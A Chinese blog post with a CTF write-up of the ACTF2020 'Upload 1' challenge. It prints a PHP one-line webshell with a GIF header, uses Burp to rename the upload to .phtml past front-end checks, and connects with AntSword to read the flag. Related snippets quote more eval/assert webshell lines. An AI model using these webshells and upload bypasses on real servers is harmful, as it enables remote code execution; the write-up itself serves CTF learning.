[ACTF2020 新生赛]Upload 1

最新推荐文章于 2024-07-27 14:11:21 发布
最新推荐文章于 2024-07-27 14:11:21 发布
阅读量413 收藏 2
点赞数 2
分类专栏: CTF做题笔记 文章标签: 安全 网络安全 web安全 php 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73734159/article/details/134275561
版权

题目环境:
image.png

仍旧是文件上传漏洞

这道题和上一道大差不差、大同小异、这里不再赘述。
[极客大挑战 2019]Upload 1:https://blog.csdn.net/m0_73734159/article/details/134267317?spm=1001.2014.3001.5501
区别在于本题需要在抓包数据里面改文件后缀,在外部改是不行的
这两道题可以对比进行研究

编写一语句木马脚本
GIF89a<script language="php">@eval($_POST['shell']);</script>
文件命名为flag.jpg
image.png
image.png
上传文件并进行抓包
image.png
在抓包数据里面进行修改文件后缀将flag.jpg修改为flag.phtml
记住原文件不要动只在数据包里面修改,不然的话是绕不过的!!!
image.png
Repeater重放Send
成功上传
image.png
访问上传的文件
image.png
此时已经可以进行蚁剑连接了
复制URL进行蚁剑连接
image.png
在/根目录下找到flag文件
image.png
访问flag文件
image.png
得到flag:
flag{9c59f5e5-7dd6-48fa-90f0-dae0ab50e190}

白猫a~
关注
专栏目录
ACTF2020 新生 Upload 1
qq_52715164的博客
04-20 3936
打开网页发现是个文件上传的页面,试着上传php文件,发现不行后, 尝试burp抓包,修改文件后缀,进行前端绕过,发现可行。 具体步骤如下: 1、书写一句话木马,例如: eval和assert: php任意代码执行的一句话后门,我们喜欢用的是传统的eval,php5,7通用。 <?php @eval($_GET["cmd"]); ?> <?php @assert($_POST['a']) ?> create_function和preg_replace函数: create_func
[ACTF2020 新生]Upload1(详解)
2301_77451464的博客
02-04 1454
buuctf web [ACTF2020 新生]Upload1(详解)
[ACTF2020 新生]Upload1
最新发布
jamesP777的博客
07-27 345
一道简单的文件上传漏洞题目,通过阅读源码找到上传路径,用burp跳过前端验证,上传.phtml木马脚本即可
[ACTF2020 新生]Upload-1
V50小白
10-08 5673
小编今天又来写文章啦,距离上次写文章过了一个多月,小编前段时间太忙,好久没更新文章了。现在小编回来继续做着安全的题目,这次是一个BUUCTF平台的一到文件上传漏洞题。以下为小编为小伙伴们的解题思路:, 1、题目内容, 鼠标放在灯泡上发现存在文件上传。 2、随便上传一张图片,如下可得图片上传保存的地址,访问试试看 3、试着上传php一句话马文件,出现只能上传图片 4、Burp抓包发现,对文件格式只在前台验证好办多了,思路:先上传一张一句话马图片,抓包将图片尾缀改为php文件,发现原来
BUUCTF-Web- [ACTF2020 新生]Upload
weixin_67813445的博客
03-14 178
本题考察文件上传前端校验以及.phtml的用法
BUUCTF-Web-[ACTF2020新生]Upload
m0_61851859的博客
03-27 436
4.打开burpsuite进行抓包,修改为php文件类型并将数据包发送回去,发现上传失败。5. 考虑是不是网站对php后缀进行过滤,采取黑名单绕过修改文件后缀为.phtml,上传成功。3.将文件后缀名修改为.jpg类型上传文件,上传成功。(但此时文件有错木马无法连接)1.打开题目在小灯泡那发现了文件上传,因此猜测存在文件上传漏洞。2.尝试上传一句话木马,上传失败仅允许上传弹窗提示的文件类型。7.连接成功并找到flag。6.使用蚁剑进行连接。
BUUCTF-Web:[ACTF2020 新生]Upload
m0_56161093的博客
05-30 1127
题目 解题过程 1、上传文件 从网页上来看,可以上传文件,我们尝试上传一个PHP一句话木马。结果如下: 提示我们只能上传图片类型的文件,尝试用burpsuite抓包,发现同样有弹窗,但没有抓到数据。所以这里猜测这里是前端JS进行校验的 2、绕过前端校验 方法一 禁用一下 js 再提交,就可以绕过了 方法二 修改PHP后缀为图片的后缀然后上传,再重新抓包修改后缀 修改前: 修改后: 上传结果如下: 可以看到上传失败,应该是服务器端对上传的文件进行了校验。 3、绕过上传黑名单 常规PHP文件后缀
[ACTF2020 新生]BackupFile 1
07-25
鉴于提供的引用内容,\[ACTF2020 新生\]BackupFile 1是一道题目,它涉及到备份文件的寻找和查看。常见的备份文件包括“.git”、“.svn”、“.swp”、“.~”、“.bak”、“.bash_history”、“.bkf”。可以使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白猫a~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值